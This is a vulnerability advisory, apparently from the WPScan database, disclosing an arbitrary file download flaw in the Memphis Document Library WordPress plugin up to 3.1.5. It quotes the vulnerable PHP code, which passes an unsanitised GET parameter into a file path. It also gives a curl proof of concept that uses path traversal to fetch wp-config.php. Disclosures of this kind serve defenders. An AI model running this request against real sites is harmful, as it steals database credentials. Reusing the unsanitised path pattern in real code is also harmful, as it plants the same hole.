Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The function "mdocs_img_preview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system.

The vulnerable GET parameter is "mdocs-img-preview".

The vulnerable code is in lines 90 to 93 of file "memphis-documents-library/mdocs-downloads.php":

87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }
Proof of Concept
curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

Affects

Plugin memphis-documents-library
fixed in version 3.1.6

References

EXPLOITDB 39593

Classification

Type BYPASS

Miscellaneous

Submitter Felipe Molina
Submitter Twitter felmoltor
Views 184
Verified No
WPVDB ID 8419

Timeline

Publicly Published 2016-03-22 (9 months ago)
Added 2016-03-22 (9 months ago)
Last Updated 2016-03-22 (9 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.